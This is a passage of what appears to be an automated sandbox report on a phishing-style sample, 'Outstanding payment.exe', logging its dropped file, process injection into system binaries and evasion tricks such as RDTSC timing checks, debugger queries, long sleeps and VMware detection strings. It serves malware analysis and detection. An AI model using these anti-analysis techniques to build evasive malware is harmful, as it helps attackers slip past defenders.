Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Outstanding payment.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iBSWjb.exe PID: 6648, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 879904 second address: 87990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 879B6E second address: 879B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: 1050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: 29E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: 49E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: 5070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: 6070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: 61A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: 71A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: B300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: C300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: C790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: D790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: E790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: F790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: 10790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 3150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 3300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 5300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 5970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 6970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 6AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 7AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: B570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 9D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: C570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: 6AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: B570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: C570000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_015CE0D0 rdtsc

9_2_015CE0D0

Source: C:\Users\user\Desktop\Outstanding payment.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7088	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1625	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7998	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1571	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9681	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 870	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.7 %

Source: C:\Users\user\Desktop\Outstanding payment.exe TID: 6224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 384	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6004	Thread sleep count: 9681 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6004	Thread sleep time: -19362000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6004	Thread sleep count: 265 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6004	Thread sleep time: -530000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe TID: 4796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4720	Thread sleep count: 127 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4720	Thread sleep time: -254000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4720	Thread sleep count: 9270 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4720	Thread sleep time: -18540000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Outstanding payment.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe	Jump to behavior

Source: explorer.exe, 0000000A.00000003.3096220072.0000000009B77000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000000A.00000000.2095932568.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 0000000A.00000000.2105292943.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 0000000A.00000003.3096220072.0000000009B77000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000A.00000003.3096220072.0000000009B77000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 0000000A.00000002.4534821677.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 0000000A.00000003.3096220072.0000000009B77000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.2092490367.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000000A.00000003.3096220072.0000000009B77000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000A.00000000.2090992450.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 0000000A.00000000.2092490367.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 0000000A.00000000.2095932568.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 0000000A.00000000.2105292943.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.2092490367.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 0000000A.00000000.2092490367.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 0000000A.00000003.3096220072.0000000009B77000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 0000000A.00000000.2090992450.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: iBSWjb.exe, 0000000B.00000002.2153882426.00000000089B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f')
Source: explorer.exe, 0000000A.00000002.4534821677.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.2095932568.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\Outstanding payment.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_015CE0D0 rdtsc

9_2_015CE0D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_01612B60 LdrInitializeThunk,

9_2_01612B60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01612160 mov eax, dword ptr fs:[00000030h]	9_2_01612160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6154 mov eax, dword ptr fs:[00000030h]	9_2_015D6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6154 mov eax, dword ptr fs:[00000030h]	9_2_015D6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CC156 mov eax, dword ptr fs:[00000030h]	9_2_015CC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D2140 mov ecx, dword ptr fs:[00000030h]	9_2_015D2140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D2140 mov eax, dword ptr fs:[00000030h]	9_2_015D2140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01600124 mov eax, dword ptr fs:[00000030h]	9_2_01600124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E61D1 mov eax, dword ptr fs:[00000030h]	9_2_015E61D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E61D1 mov eax, dword ptr fs:[00000030h]	9_2_015E61D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016001F8 mov eax, dword ptr fs:[00000030h]	9_2_016001F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0164E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0164E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E1D0 mov ecx, dword ptr fs:[00000030h]	9_2_0164E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0164E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0164E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0162E1D8 mov eax, dword ptr fs:[00000030h]	9_2_0162E1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016401DA mov eax, dword ptr fs:[00000030h]	9_2_016401DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016401DA mov eax, dword ptr fs:[00000030h]	9_2_016401DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA197 mov eax, dword ptr fs:[00000030h]	9_2_015CA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA197 mov eax, dword ptr fs:[00000030h]	9_2_015CA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA197 mov eax, dword ptr fs:[00000030h]	9_2_015CA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01610185 mov eax, dword ptr fs:[00000030h]	9_2_01610185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165019F mov eax, dword ptr fs:[00000030h]	9_2_0165019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165019F mov eax, dword ptr fs:[00000030h]	9_2_0165019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165019F mov eax, dword ptr fs:[00000030h]	9_2_0165019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165019F mov eax, dword ptr fs:[00000030h]	9_2_0165019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A060 mov eax, dword ptr fs:[00000030h]	9_2_0160A060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D2050 mov eax, dword ptr fs:[00000030h]	9_2_015D2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01632045 mov eax, dword ptr fs:[00000030h]	9_2_01632045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FC073 mov eax, dword ptr fs:[00000030h]	9_2_015FC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01656050 mov eax, dword ptr fs:[00000030h]	9_2_01656050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE016 mov eax, dword ptr fs:[00000030h]	9_2_015EE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE016 mov eax, dword ptr fs:[00000030h]	9_2_015EE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE016 mov eax, dword ptr fs:[00000030h]	9_2_015EE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE016 mov eax, dword ptr fs:[00000030h]	9_2_015EE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654000 mov ecx, dword ptr fs:[00000030h]	9_2_01654000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA020 mov eax, dword ptr fs:[00000030h]	9_2_015CA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CC020 mov eax, dword ptr fs:[00000030h]	9_2_015CC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016560E0 mov eax, dword ptr fs:[00000030h]	9_2_016560E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016120F0 mov ecx, dword ptr fs:[00000030h]	9_2_016120F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CC0F0 mov eax, dword ptr fs:[00000030h]	9_2_015CC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D80E9 mov eax, dword ptr fs:[00000030h]	9_2_015D80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016520DE mov eax, dword ptr fs:[00000030h]	9_2_016520DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA0E3 mov ecx, dword ptr fs:[00000030h]	9_2_015CA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D208A mov eax, dword ptr fs:[00000030h]	9_2_015D208A
